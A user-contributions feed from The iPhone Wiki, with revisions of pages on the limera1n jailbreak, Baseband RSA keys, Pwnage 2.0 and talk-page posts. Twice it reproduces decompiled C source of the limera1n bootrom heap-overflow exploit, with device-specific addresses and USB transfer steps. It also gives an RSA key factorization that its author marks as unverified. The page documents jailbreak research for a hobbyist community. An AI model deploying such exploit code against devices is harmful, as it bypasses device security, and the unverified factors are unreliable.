The iPhone Wiki - User contributions [en]

Limera1n

2012-01-03T21:13:49Z

Paul0:

{{lowercase}}
[[Image:Ra1ndrop.png|right]]
This is [[User:Geohot|geohot]]'s [[jailbreak]] utility. It uses an undisclosed bootrom exploit and [[User:Comex|comex]]'s [[Packet Filter Kernel Exploit]] to achieve an [[untethered jailbreak]] on newer devices. The following devices are technically supported:
* [[n88ap|iPhone 3GS]]
* [[n90ap|iPhone 4]]
* [[n18ap|iPod touch 3G]]
* [[n81ap|iPod touch 4G]]
* [[k48ap|iPad]]
* [[k66ap|AppleTV 2G]] (creates a bare-bones jailbreak by mounting '/' as read/write in /etc/fstab)
limera1n has been demonstrated multiple times by [[User:Geohot|geohot]], using blog posts on his now private blog. [[User:Geohot|Geohot]] showed off a high-res picture of [http://1.bp.blogspot.com/_NJ4JFBfr1tY/TDgkAsTQEmI/AAAAAAAAAcw/ZNHDxMNNL4Y/s1600/iphone4.png Cydia on an iPhone 4]. He displayed an [http://www.youtube.com/watch?v=__TR86PLiHw iPod touch 3G with an untethered jailbreak] that met MuscleNerd's requirements for a good video. In addition, he took a picture of [http://4.bp.blogspot.com/_NJ4JFBfr1tY/S7_OvGMqJMI/AAAAAAAAAcE/R5WLrCizGw0/s1600/ipad_jb.jpg Cydia and blackra1n icons on an iPad].

* '''Release Date:''' [[Timeline#October|October 9, 2010]]
* '''Supported OS's:''' Mac OS X, Windows
* '''Supported Operations:''' [[hacktivation]], [[jailbreak]]ing
* '''Supported iOS: 3.2.2-4.1

== Release text ==
<div style="text-align: center">limera1n, 6 months in the making<br />
iPhone 3GS, iPod Touch 3G, iPad, iPhone 4, iPod Touch 4G<br />
4.0-4.1 and beyond+++<br />
limera1n is unpatchable<br />
untethered thanks to jailbreakme star '''comex'''<br />
brought to you by '''geohot'''<br />
hacktivates<br />
Mac coming in 7 years<br />
donations keep support alive<br />
zero pictures of my face</div>

== Credit ==
* '''[[User:Geohot|geohot]]''' - The program itself, and the bootrom exploit.
* '''[[User:Comex|comex]]''' - The userland exploit that allows limera1n to run [[untethered jailbreak|untethered]].

== Changelog ==
{| class="wikitable"
|-
| <div style="text-align: center">'''Version'''</div>
| <div style="text-align: center">'''Release time'''</div>
| <div style="text-align: center">'''MD5 Hash'''</div>
| <div style="text-align: center">'''Change comment'''</div>
|-
| BETA 1
| 9 Oct 2010 XX:XX GMT
| 2f2b09a6ed5c5613d5361d8a9d0696b6
| First release.
|-
| BETA 2
| 10 Oct 2010 XX:XX GMT
| a70dccb3dfc0e505687424184dc3d1ce
| Fixed kernel patching magic. Rerun BETA2+ over BETA1.
|-
| BETA 3
| 10 Oct 2010 XX:XX GMT
| 81730090f7de1576268ee8c2407c3d35
| Fixed an issue with [[N88ap|iPhone 3GS]] ([[iBoot-359.3.2|new bootrom]])
|-
| BETA 4
| 10 Oct 2010 XX:XX GMT
| d901c4b3a544983f095b0d03eb94e4db
| Uninstall fixed, respring fixed
|-
| RC1
| 11 Oct 2010 XX:XX GMT
| 0622d99ffe4c25f75c720a689853845f
| out of beta! afc2, reliability improvements, no reboot for cydia, 2kb smaller
|-
| RC1b
| 11 Oct 2010 XX:XX GMT
| fc6f7d696a57c3baede49bdff8a7f43f
| addresses an install issue, mainly with iPads
|-
| Final
| 11 Oct 2010 23:XX GMT
| fc6f7d696a57c3baede49bdff8a7f43f
| (same as RC1b)
|}

== Technical Information ==
=== Basics ===
* limera1n has nothing to do with [[SHAtter]] at all.
* limera1n uses a [[bootrom]] exploit to achieve the [[tethered jailbreak]] and unsigned code execution.
* limera1n uses a [[userland]] exploit to make it [[untethered]], which was developed by [[User:Comex|comex]].
* limera1n uses a hacktivation dylib to perform [[hacktivation]].

=== Exploits ===
limera1n reuses the [[Limera1n_Exploit|usb_control_msg(0x21,2)]] but exploits a different vulnerability.
=== Process ===
The jailbreak appears to execute something like the following (in no particular order):
* In recovery1,
"setenv debug-uarts 1
setenv auto-boot false
saveenv"
* In [[DFU Mode]], it uploads a [[payload]].
* In recovery2, it uploads another [[payload]] and its [[ramdisk]].
"setenv auto-boot true
reset
geohot done"

=== Interesting Messages ===
"geohot black is the new purple"

"blackra1n start: %d current IRQ mask is %8.8X
usb irq disabled...shhh
fxns found @ %8.8X %8.8X
found iBoot @ %8.8X
i'm back from IRQland...
3g detected, kicking nor
nor kicked
memcpy done
iBoot restored!!!
found command table @ %8.8X
cmd_geohot added
time to pray...%8.8X"

"2.2X send command(%d): %s
send exploit!!!
sent data to copy: %X
sent shellcode: %X has real length %X
never freed: %X
sent fake data to timeout: %X
sent exploit to heap overflow: %X
sending file with length: 0x%X Mingw runtime failure:
VirtualQuery failed for %d bytes at address %p Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d."

== Controversy ==
The release of this jailbreak was specifically designed to pressure [[Chronic Dev (team)]] into not releasing SHAtter, but to instead implement the limera1n exploit into [[Greenpois0n (jailbreak)|greenpois0n]]; after releasing limera1n, releasing [[SHAtter]] would uselessly disclose another bootrom exploit to Apple.

[[User:Geohot|Geohot]]'s rationale is that Apple already discovered, through internal testing, the limera1n exploit, making it very likely that it will be fixed in the next bootrom revision. Because [[iBoot]] code is present both in the bootrom and firmware, and because firmware is refreshed much more often than bootrom code, any fix in this code branch would appear first in firmware. [[User:Geohot|Geohot]] observed his limera1n exploit was closed in firmware and concluded that it would almost certainly be fixed in the next bootrom revision, whereas [[SHAtter]] still has a chance of remaining useful for an indefinite amount of time. In the [[iPad 2]], the exploit is indeed fixed, and the limera1n exploit is not present. It was fixed before the release of limera1n according to the build number. This has been confirmed by [[User:posixninja|p0sixninja]].

limera1n's [[Untethered jailbreak|untethered]] userland exploit for iOS 4.0 and 4.1 was obtained by [[User:Geohot|geohot]] under questionable circumstances from [[User:Comex|comex]]. [[User:Comex|Comex]] did end up fixing the kernel patching code by beta2, so as to not break users' devices.

== Hacktivation ==
limera1n will copy hacktivation.dylib to [[:/usr/lib]] and change entries to com.apple.mobile.lockdown.plist, whether it has been activated using iTunes or not. This, while helpful to many, can also be harmful to legitimate activators. For a guide on how to remove this hacktivation on iTunes activated devices, see the link below.

== External Links ==
* [http://limera1n.com/ Official domain]
* [http://theiphonewiki.com/limera1n The iPhone Wiki Mirror]
* [http://www.mediafire.com/?5sovoo41rbcdspw Limera1n RC Beta2 Dump on Mediafire provided by iH8sn0w.]
* [http://www.pastie.org/1210054 Veeence's explanation for release]
* [http://www.cmdshft.ipwn.me/blog/?p=555 Hacktivation removal guide.]

[[Category:Hacking Software]]

Limera1n Exploit

2012-01-02T20:19:19Z

Paul0:

{{lowercase}}
The '''limera1n exploit''' is the [[bootrom]] exploit used to run unsigned code (and thereby jailbreak) the [[N88ap|iPhone 3GS]], [[N18ap|iPod touch 3G]], [[N81ap|iPod touch 4G]], [[K48ap|iPad]], [[N90ap|iPhone 4 GSM]], [[N92ap|iPhone 4 CDMA]], and the [[K66ap|Apple TV 2G]]. It was first used in the [[limera1n]] tool by [[User:geohot|geohot]]. It is actively used on all the supported devices to perform a jailbreak on current versions of [[iOS]], which is [[tethered jailbreak|tethered]] unless there is another exploit available to "[[untethered jailbreak|untether]]" the jailbreak, such as the [[0x24000 Segment Overflow]] or the [[Packet Filter Kernel Exploit]].

==Source Code==
signed int __cdecl upload_exploit() {
int device_type;
signed int payload_address;
int free_address;
int deviceerror;
char *chunk_headers_ptr;
unsigned int sent_counter;
//int v6;
signed int result;
//signed int v8;
int recv_error_code;
signed int payload_address2;
signed int padding_size;
char payload;
char chunk_headers;
/*int v14;
v14 = *MK_FP(__GS__, 20); */
device_type = *(_DWORD *)(device + 16);

if ( device_type == 8930 ) {
padding_size = 0x2A800;
payload_address = 0x8402B001;
free_address = 0x8403BF9C;
} else {
payload_address = 0x84023001;
padding_size = 0x22800;
// free_address = (((device_type == 8920) – 1) & 0xFFFFFFF4) – 0x7BFCC05C;
if(device_type == 8920) free_address = 0x84033FA4;
else free_address = 84033F98;

}

memset(&payload, 0, 0×800);
memcpy(&payload, exploit, 0×230);

if (libpois0n_debug) {
//v8 = payload_address;
fprintf(stderr, 1, "Resetting device counters\n");
//payload_address = v8;
}

payload_address2 = payload_address;
deviceerror = irecv_reset_counters(client);

if ( deviceerror ) {
irecv_strerror(deviceerror);
fprintf(stderr, 1, &aCannotFindS[12]);
result = -1;
} else {
memset(&chunk_headers, 0xCC, 0×800);
chunk_headers_ptr = &chunk_headers;

do {
*(_DWORD *)chunk_headers_ptr = 1029;
*((_DWORD *)chunk_headers_ptr + 1) = 257;
*((_DWORD *)chunk_headers_ptr + 2) = payload_address2;
*((_DWORD *)chunk_headers_ptr + 3) = free_address;
chunk_headers_ptr += 64;
} while ((int *)chunk_headers_ptr != &v14);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending chunk headers\n");

sent_counter = 0;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
memset(&chunk_headers, 0xCC, 0×800);

do {
sent_counter += 0x800;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
} while (sent_counter < padding_size);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending exploit payload\n");

irecv_control_transfer(client, 0x21, 1, 0, 0, &payload, 0x800);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending fake data\n");

memset(&chunk_headers, 0xBB, 0x800);
irecv_control_transfer(client, 0xA1, 1, 0, 0, &chunk_headers, 0x800);
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);

if (libpois0n_debug)
fprintf(stderr, 1, "Executing exploit\n");

irecv_control_transfer(client, 0x21, 2, 0, 0, &chunk_headers, 0);
irecv_reset(client);
irecv_finish_transfer(client);

if (libpois0n_debug) {
fprintf(stderr, 1, "Exploit sent\n");
if (libpois0n_debug)
fprintf(stderr, 1, "Reconnecting to device\n");
}

client = (void *)irecv_reconnect(client, 2);

if (client) {
result = 0;
} else {
if (libpois0n_debug) {
recv_error_code = irecv_strerror(0);
fprintf(stderr, 1, &aCannotFindS[12], recv_error_code);
}
fprintf(stderr, 1, "Unable to reconnect\n");
result = -1;
}
}

/* compiler stack check
if (*MK_FP(__GS__, 20) != v14)
__stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
*/
return result;
}

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

Limera1n Exploit

2012-01-02T20:14:09Z

Paul0: made code more readable

{{lowercase}}
The '''limera1n exploit''' is the [[bootrom]] exploit used to run unsigned code (and thereby jailbreak) the [[N88ap|iPhone 3GS]], [[N18ap|iPod touch 3G]], [[N81ap|iPod touch 4G]], [[K48ap|iPad]], [[N90ap|iPhone 4 GSM]], [[N92ap|iPhone 4 CDMA]], and the [[K66ap|Apple TV 2G]]. It was first used in the [[limera1n]] tool by [[User:geohot|geohot]]. It is actively used on all the supported devices to perform a jailbreak on current versions of [[iOS]], which is [[tethered jailbreak|tethered]] unless there is another exploit available to "[[untethered jailbreak|untether]]" the jailbreak, such as the [[0x24000 Segment Overflow]] or the [[Packet Filter Kernel Exploit]].

==Source Code==
signed int __cdecl upload_exploit() {
int device_type;
signed int payload_address;
int free_address;
int deviceerror;
char *chunk_headers_ptr;
unsigned int sent_counter;
//int v6;
signed int result;
//signed int v8;
int recv_error_code;
signed int payload_address2;
signed int padding_size;
char payload;
char chunk_headers;
/* int v14;
v14 = *MK_FP(__GS__, 20); */
device_type = *(_DWORD *)(device + 16);

if ( device_type == 8930 ) {
padding_size = 0x2A800;
payload_address = 0x8402B001;
free_address = 0x8403BF9C;
} else {
payload_address = 0x84023001;
padding_size = 0x22800;
// free_address = (((device_type == 8920) – 1) & 0xFFFFFFF4) – 0x7BFCC05C;
if(device_type == 8920) free_address = 0x84033FA4;
else free_address = 84033F98;

}

memset(&payload, 0, 0×800);
memcpy(&payload, exploit, 0×230);

if (libpois0n_debug) {
//v8 = payload_address;
fprintf(stderr, 1, "Resetting device counters\n");
//payload_address = v8;
}

payload_address2 = payload_address;
deviceerror = irecv_reset_counters(client);

if ( deviceerror ) {
irecv_strerror(deviceerror);
fprintf(stderr, 1, &aCannotFindS[12]);
result = -1;
} else {
memset(&chunk_headers, 0xCC, 0×800);
chunk_headers_ptr = &chunk_headers;

do {
*(_DWORD *)chunk_headers_ptr = 1029;
*((_DWORD *)chunk_headers_ptr + 1) = 257;
*((_DWORD *)chunk_headers_ptr + 2) = payload_address2;
*((_DWORD *)chunk_headers_ptr + 3) = free_address;
chunk_headers_ptr += 64;
} while ((int *)chunk_headers_ptr != &v14);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending chunk headers\n");

sent_counter = 0;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
memset(&chunk_headers, 0xCC, 0×800);

do {
sent_counter += 0x800;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
} while (sent_counter < padding_size);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending exploit payload\n");

irecv_control_transfer(client, 0x21, 1, 0, 0, &payload, 0x800);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending fake data\n");

memset(&chunk_headers, 0xBB, 0x800);
irecv_control_transfer(client, 0xA1, 1, 0, 0, &chunk_headers, 0x800);
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);

if (libpois0n_debug)
fprintf(stderr, 1, "Executing exploit\n");

irecv_control_transfer(client, 0x21, 2, 0, 0, &chunk_headers, 0);
irecv_reset(client);
irecv_finish_transfer(client);

if (libpois0n_debug) {
fprintf(stderr, 1, "Exploit sent\n");
if (libpois0n_debug)
fprintf(stderr, 1, "Reconnecting to device\n");
}

client = (void *)irecv_reconnect(client, 2);

if (client) {
result = 0;
} else {
if (libpois0n_debug) {
recv_error_code = irecv_strerror(0);
fprintf(stderr, 1, &aCannotFindS[12], recv_error_code);
}
fprintf(stderr, 1, "Unable to reconnect\n");
result = -1;
}
}

/* compiler stack check
if (*MK_FP(__GS__, 20) != v14)
__stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
*/
return result;
}

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

Baseband RSA Keys

2011-03-15T17:46:28Z

Paul0:

These are the keys shared between the [[S-Gold 2]] and the [[X-Gold 608]]

==Key 1==
This is used to validate the NCK token and decrypt secpack certificates.

Modulus length 0x400 bits, Exponent 0x3
0B 23 AE BA E3 75 7B 9D CE 44 58 8C CF 53 CC B0
73 F9 06 57 64 37 A0 6C 68 F4 91 4E 7A 82 CB 6E
12 CF FD 31 39 51 4C 06 C0 E9 CE A0 27 17 D6 95
FB DF 94 26 B2 1C C1 73 24 06 E3 A8 C2 0F 5D A3
41 6B D8 84 CB D0 EB 2E F9 DE 2F 21 78 DA C3 4D
AF B9 BA D8 4B 7C 16 E2 CF 16 7A 1B 57 33 4F 26
4D 53 26 FD 8E 38 B6 23 CE 5E B4 81 80 2B C0 FB
9F 33 E1 3F 65 A2 49 C9 3F 08 6C 37 61 4B B7 C7

==Key 2==
This is used to sign Key 3 in the [[WildcardTicket|wildcard ticket]] that is part of the [[activation token]].

Modulus length 0x400 bits, Exponent 0x3
05 BC 9F 4E 87 0C F9 A2 D8 DA 19 D8 14 82 B2 54
3F 32 4D 08 0B AE 22 01 86 43 A1 0E 18 7A D1 F2
4F CB 34 C6 10 C2 72 DB E3 B5 29 79 B2 80 34 E1
4F A4 27 85 C5 04 57 4A 37 88 AD 9A 6B 57 C5 E0
4F E5 89 80 1E ED AC 72 78 B1 73 05 FC 5E D1 3D
46 9F 66 C4 B5 B4 4B 9E 87 8C 2E 3C BD 0C 15 AA
D1 D5 57 71 00 D6 10 F7 96 E2 CF AC 60 53 57 C7
65 AD 1D CB BC 5F 49 FD B5 ED EA B3 21 30 66 EA

==Key 3 (not semiprime?)==
This is used for signing in the [[WildcardTicket|wildcard ticket]]. The serial number is 1.

Modulus length 0x400 bits, Exponent 0x3
4b 52 5a e7 09 fd 94 14 3f d9 6e c6 88 c8 ce cc
6e b7 43 89 05 d9 b2 8b a5 58 3d b4 cc 19 c3 31
ff 09 e7 11 2e 26 be b4 76 62 20 82 76 ed 96 d5
22 77 10 b7 6d ef 09 64 fb 2c cc b8 d1 5b 68 5d
61 15 64 a3 32 df 3d 6c 7d 8e 2c 04 e0 9f 6d 15
9e 5e 9a 68 c2 d6 67 c8 fd 65 03 c3 ab 49 b8 4b
94 f5 c4 ca 53 91 4b 9d 7b be 68 2b 92 95 56 68
fa 89 8e 3a 17 38 76 77 df 0f 90 b0 a0 46 1c f3
f8 48 dc 32 1b f8 a1 ff 7e 26 56 0e ce 77 95 0f

(not prime) f2 =
24 95 0d 4a 72 24 f5 6a 15 5f 6f 58 e3 3b f9 92
c5 fb 21 5c bb 9d a3 8a 63 62 1c 91 90 89 f0 4a
10 2e c8 86 17 78 13 0f a7 fd 73 31 aa f0 8c a3
63 88 e9 4d 51 d6 db cf 80 4e 6d df 12 f9 20 ab
f9 d3 4a 17 b1 77 76 6c 9a fa 4a 62 5a dc b1 5e
98 d3 3f 6e fa 24 ce ae ba 08 8c d8 c3 8c 1a ad
e2 c2 bc cd c3 04 05 59 92 00 7d 8e 06 20 e5 de
2f 11 f6 e0 7

(not prime) f1 =
20 f1 89 de ed 41 e6 df eb ea 2c 19 38 47 3b 29
25 bb 00 af 02 32 bd f5 52 31 de b9

* Key3 = f1*f2. Please verify, thanks. yafu might be buggy
[[Category:Baseband]]

Baseband RSA Keys

2011-03-15T17:35:37Z

Paul0:

These are the keys shared between the [[S-Gold 2]] and the [[X-Gold 608]]

==Key 1==
This is used to validate the NCK token and decrypt secpack certificates.

Modulus length 0x400 bits, Exponent 0x3
0B 23 AE BA E3 75 7B 9D CE 44 58 8C CF 53 CC B0
73 F9 06 57 64 37 A0 6C 68 F4 91 4E 7A 82 CB 6E
12 CF FD 31 39 51 4C 06 C0 E9 CE A0 27 17 D6 95
FB DF 94 26 B2 1C C1 73 24 06 E3 A8 C2 0F 5D A3
41 6B D8 84 CB D0 EB 2E F9 DE 2F 21 78 DA C3 4D
AF B9 BA D8 4B 7C 16 E2 CF 16 7A 1B 57 33 4F 26
4D 53 26 FD 8E 38 B6 23 CE 5E B4 81 80 2B C0 FB
9F 33 E1 3F 65 A2 49 C9 3F 08 6C 37 61 4B B7 C7

==Key 2==
This is used to sign Key 3 in the [[WildcardTicket|wildcard ticket]] that is part of the [[activation token]].

Modulus length 0x400 bits, Exponent 0x3
05 BC 9F 4E 87 0C F9 A2 D8 DA 19 D8 14 82 B2 54
3F 32 4D 08 0B AE 22 01 86 43 A1 0E 18 7A D1 F2
4F CB 34 C6 10 C2 72 DB E3 B5 29 79 B2 80 34 E1
4F A4 27 85 C5 04 57 4A 37 88 AD 9A 6B 57 C5 E0
4F E5 89 80 1E ED AC 72 78 B1 73 05 FC 5E D1 3D
46 9F 66 C4 B5 B4 4B 9E 87 8C 2E 3C BD 0C 15 AA
D1 D5 57 71 00 D6 10 F7 96 E2 CF AC 60 53 57 C7
65 AD 1D CB BC 5F 49 FD B5 ED EA B3 21 30 66 EA

==Key 3==
This is used for signing in the [[WildcardTicket|wildcard ticket]]. The serial number is 1.

Modulus length 0x400 bits, Exponent 0x3
4b 52 5a e7 09 fd 94 14 3f d9 6e c6 88 c8 ce cc
6e b7 43 89 05 d9 b2 8b a5 58 3d b4 cc 19 c3 31
ff 09 e7 11 2e 26 be b4 76 62 20 82 76 ed 96 d5
22 77 10 b7 6d ef 09 64 fb 2c cc b8 d1 5b 68 5d
61 15 64 a3 32 df 3d 6c 7d 8e 2c 04 e0 9f 6d 15
9e 5e 9a 68 c2 d6 67 c8 fd 65 03 c3 ab 49 b8 4b
94 f5 c4 ca 53 91 4b 9d 7b be 68 2b 92 95 56 68
fa 89 8e 3a 17 38 76 77 df 0f 90 b0 a0 46 1c f3
f8 48 dc 32 1b f8 a1 ff 7e 26 56 0e ce 77 95 0f

f2 =
24 95 0d 4a 72 24 f5 6a 15 5f 6f 58 e3 3b f9 92
c5 fb 21 5c bb 9d a3 8a 63 62 1c 91 90 89 f0 4a
10 2e c8 86 17 78 13 0f a7 fd 73 31 aa f0 8c a3
63 88 e9 4d 51 d6 db cf 80 4e 6d df 12 f9 20 ab
f9 d3 4a 17 b1 77 76 6c 9a fa 4a 62 5a dc b1 5e
98 d3 3f 6e fa 24 ce ae ba 08 8c d8 c3 8c 1a ad
e2 c2 bc cd c3 04 05 59 92 00 7d 8e 06 20 e5 de
2f 11 f6 e0 7

(not prime) f1 =
20 f1 89 de ed 41 e6 df eb ea 2c 19 38 47 3b 29
25 bb 00 af 02 32 bd f5 52 31 de b9

* Please verify, thanks
[[Category:Baseband]]

Baseband RSA Keys

2011-03-15T17:24:48Z

Paul0:

These are the keys shared between the [[S-Gold 2]] and the [[X-Gold 608]]

==Key 1==
This is used to validate the NCK token and decrypt secpack certificates.

Modulus length 0x400 bits, Exponent 0x3
0B 23 AE BA E3 75 7B 9D CE 44 58 8C CF 53 CC B0
73 F9 06 57 64 37 A0 6C 68 F4 91 4E 7A 82 CB 6E
12 CF FD 31 39 51 4C 06 C0 E9 CE A0 27 17 D6 95
FB DF 94 26 B2 1C C1 73 24 06 E3 A8 C2 0F 5D A3
41 6B D8 84 CB D0 EB 2E F9 DE 2F 21 78 DA C3 4D
AF B9 BA D8 4B 7C 16 E2 CF 16 7A 1B 57 33 4F 26
4D 53 26 FD 8E 38 B6 23 CE 5E B4 81 80 2B C0 FB
9F 33 E1 3F 65 A2 49 C9 3F 08 6C 37 61 4B B7 C7

==Key 2==
This is used to sign Key 3 in the [[WildcardTicket|wildcard ticket]] that is part of the [[activation token]].

Modulus length 0x400 bits, Exponent 0x3
05 BC 9F 4E 87 0C F9 A2 D8 DA 19 D8 14 82 B2 54
3F 32 4D 08 0B AE 22 01 86 43 A1 0E 18 7A D1 F2
4F CB 34 C6 10 C2 72 DB E3 B5 29 79 B2 80 34 E1
4F A4 27 85 C5 04 57 4A 37 88 AD 9A 6B 57 C5 E0
4F E5 89 80 1E ED AC 72 78 B1 73 05 FC 5E D1 3D
46 9F 66 C4 B5 B4 4B 9E 87 8C 2E 3C BD 0C 15 AA
D1 D5 57 71 00 D6 10 F7 96 E2 CF AC 60 53 57 C7
65 AD 1D CB BC 5F 49 FD B5 ED EA B3 21 30 66 EA

==Key 3==
This is used for signing in the [[WildcardTicket|wildcard ticket]]. The serial number is 1.

Modulus length 0x400 bits, Exponent 0x3
4b 52 5a e7 09 fd 94 14 3f d9 6e c6 88 c8 ce cc
6e b7 43 89 05 d9 b2 8b a5 58 3d b4 cc 19 c3 31
ff 09 e7 11 2e 26 be b4 76 62 20 82 76 ed 96 d5
22 77 10 b7 6d ef 09 64 fb 2c cc b8 d1 5b 68 5d
61 15 64 a3 32 df 3d 6c 7d 8e 2c 04 e0 9f 6d 15
9e 5e 9a 68 c2 d6 67 c8 fd 65 03 c3 ab 49 b8 4b
94 f5 c4 ca 53 91 4b 9d 7b be 68 2b 92 95 56 68
fa 89 8e 3a 17 38 76 77 df 0f 90 b0 a0 46 1c f3
f8 48 dc 32 1b f8 a1 ff 7e 26 56 0e ce 77 95 0f

f2 =
24 95 0d 4a 72 24 f5 6a 15 5f 6f 58 e3 3b f9 92
c5 fb 21 5c bb 9d a3 8a 63 62 1c 91 90 89 f0 4a
10 2e c8 86 17 78 13 0f a7 fd 73 31 aa f0 8c a3
63 88 e9 4d 51 d6 db cf 80 4e 6d df 12 f9 20 ab
f9 d3 4a 17 b1 77 76 6c 9a fa 4a 62 5a dc b1 5e
98 d3 3f 6e fa 24 ce ae ba 08 8c d8 c3 8c 1a ad
e2 c2 bc cd c3 04 05 59 92 00 7d 8e 06 20 e5 de
2f 11 f6 e0 7

f1 =
20 f1 89 de ed 41 e6 df eb ea 2c 19 38 47 3b 29
25 bb 00 af 02 32 bd f5 52 31 de b9

* Please verify, thanks
[[Category:Baseband]]

Baseband RSA Keys

2011-03-15T17:20:31Z

Paul0:

These are the keys shared between the [[S-Gold 2]] and the [[X-Gold 608]]

==Key 1==
This is used to validate the NCK token and decrypt secpack certificates.

Modulus length 0x400 bits, Exponent 0x3
0B 23 AE BA E3 75 7B 9D CE 44 58 8C CF 53 CC B0
73 F9 06 57 64 37 A0 6C 68 F4 91 4E 7A 82 CB 6E
12 CF FD 31 39 51 4C 06 C0 E9 CE A0 27 17 D6 95
FB DF 94 26 B2 1C C1 73 24 06 E3 A8 C2 0F 5D A3
41 6B D8 84 CB D0 EB 2E F9 DE 2F 21 78 DA C3 4D
AF B9 BA D8 4B 7C 16 E2 CF 16 7A 1B 57 33 4F 26
4D 53 26 FD 8E 38 B6 23 CE 5E B4 81 80 2B C0 FB
9F 33 E1 3F 65 A2 49 C9 3F 08 6C 37 61 4B B7 C7

==Key 2==
This is used to sign Key 3 in the [[WildcardTicket|wildcard ticket]] that is part of the [[activation token]].

Modulus length 0x400 bits, Exponent 0x3
05 BC 9F 4E 87 0C F9 A2 D8 DA 19 D8 14 82 B2 54
3F 32 4D 08 0B AE 22 01 86 43 A1 0E 18 7A D1 F2
4F CB 34 C6 10 C2 72 DB E3 B5 29 79 B2 80 34 E1
4F A4 27 85 C5 04 57 4A 37 88 AD 9A 6B 57 C5 E0
4F E5 89 80 1E ED AC 72 78 B1 73 05 FC 5E D1 3D
46 9F 66 C4 B5 B4 4B 9E 87 8C 2E 3C BD 0C 15 AA
D1 D5 57 71 00 D6 10 F7 96 E2 CF AC 60 53 57 C7
65 AD 1D CB BC 5F 49 FD B5 ED EA B3 21 30 66 EA

==Key 3==
This is used for signing in the [[WildcardTicket|wildcard ticket]]. The serial number is 1.

Modulus length 0x400 bits, Exponent 0x3
4b 52 5a e7 09 fd 94 14 3f d9 6e c6 88 c8 ce cc
6e b7 43 89 05 d9 b2 8b a5 58 3d b4 cc 19 c3 31
ff 09 e7 11 2e 26 be b4 76 62 20 82 76 ed 96 d5
22 77 10 b7 6d ef 09 64 fb 2c cc b8 d1 5b 68 5d
61 15 64 a3 32 df 3d 6c 7d 8e 2c 04 e0 9f 6d 15
9e 5e 9a 68 c2 d6 67 c8 fd 65 03 c3 ab 49 b8 4b
94 f5 c4 ca 53 91 4b 9d 7b be 68 2b 92 95 56 68
fa 89 8e 3a 17 38 76 77 df 0f 90 b0 a0 46 1c f3
f8 48 dc 32 1b f8 a1 ff 7e 26 56 0e ce 77 95 0f

f2 = 0x24950d4a7224f56a155f6f58e33bf992c5fb215cbb9da38a63621c919089f04a102ec886
1778130fa7fd7331aaf08ca36388e94d51d6dbcf804e6ddf12f920abf9d34a17b177766c9afa4a62
5adcb15e98d33f6efa24ceaeba088cd8c38c1aade2c2bccdc304055992007d8e0620e5de2f11f6e0
7

f1 = 0x20f189deed41e6dfebea2c1938473b2925bb00af0232bdf55231deb9

* Please verify, thanks
[[Category:Baseband]]

Pwnage 2.0

2011-03-15T08:52:02Z

Paul0:

This exploit in the [[VROM (S5L8900)|S5L8900 bootrom]] is really the ultimate exploit, since it allows unsigned code to be run at the lowest level. It is available in all devices that use the [[S5L8900]] - the [[M68ap|iPhone]], [[N45ap|iPod Touch]] and [[N82ap|iPhone 3G]]. It is also available on some non-iOS iPods.

==Credit==
[[iPhone Dev Team]]

==Exploit==
There is a stack overflow in the certificate parsing code. By passing a malformed certificate, unsigned code can be run.

==Implementations==
*[[PwnageTool]]
*[[QuickPwn]]
*[[WinPwn]]
*[[redsn0w]]
*[[iran]]

[[Category:Bootrom Exploits]]

Talk:Bootrom Dumper Utility

2011-02-13T10:38:37Z

Paul0: /* vmware + windows */

If anyone gets it working for iPod touch 2G let me know. I am trying to work on it, but not much spare time --[[User:JacobVengeance|JakeAnthraX]] 07:27, 23 December 2010 (UTC)
:[https://github.com/liamchat/Bootrom-Dumper/tree/master/stake4uce my fork] should work --[[User:Liamchat|liamchat]] 16:27, 24 December 2010 (UTC)
:You can also use the current iPod touch 2G openiBoot [https://github.com/kleemajo/openiBoot link]. The bootrom is at 0x20000000 on the 2g touch --[[User:Kleemajo|Kleemajo]] 01:02, 26 December 2010 (UTC)
::I ended up making my own very crappy steaks4uce version to dump it. I didn't realize you made a version liam, nice job. Also where did you guys get your ARM toolchain? The one I use keeps breaking and giving me errors lately.--[[User:JacobVengeance|JakeAnthraX]] 03:38, 29 December 2010 (UTC)
::: i use sudo port install arm-elf-binutils and sudo port instal arm-elf-gcc--[[User:Liamchat|liamchat]] 10:56, 29 December 2010 (UTC)
:::: Using that I just get errors when compiling everything. I had it working on my last setup when I wrote my crappy syeaks4uce method, but now it isn't working. I will figure it out sooner or later. Thanks anyways. --[[User:JacobVengeance|JakeAnthraX]] 22:45, 29 December 2010 (UTC)
use toolchain.txt from openiboot, it works perfect --[[User:Posixninja|posixninja]] 23:41, 29 December 2010 (UTC)

== vmware + windows ==

anyone tried this on vmware + windows? can't make it work. tried on iphone 4g & ipod 3g -- [[User:Paul0|paulzero]] 10:38, 13 February 2011 (UTC)

Talk:Bootrom Dumper Utility

2011-02-13T10:38:13Z

Paul0: /* vmware + windows */

Talk:Bootrom Dumper Utility

2011-02-13T10:37:50Z

Paul0: /* vmware + windows */ new section

User:Paul0

2010-08-04T13:15:37Z

Paul0: Replacing page with 'just awesome.'

just awesome.

Talk:25C3 presentation "Hacking the iPhone"

2010-08-04T13:15:01Z

Paul0:

== Transcript ==

I am planning to put the full text of this talk into here and link all keywords within this Wiki. This would be a great help for all new hackers. I already contacted the authors, but did not get a response. And because this was a public speech and is quite old now, I assume this is ok for them. Let me know if not. --[[User:Http|http]] 23:14, 13 July 2010 (UTC)

Thanks HTTP! [[User:Iemit737|Iemit737]] 03:08, 17 July 2010 (UTC)

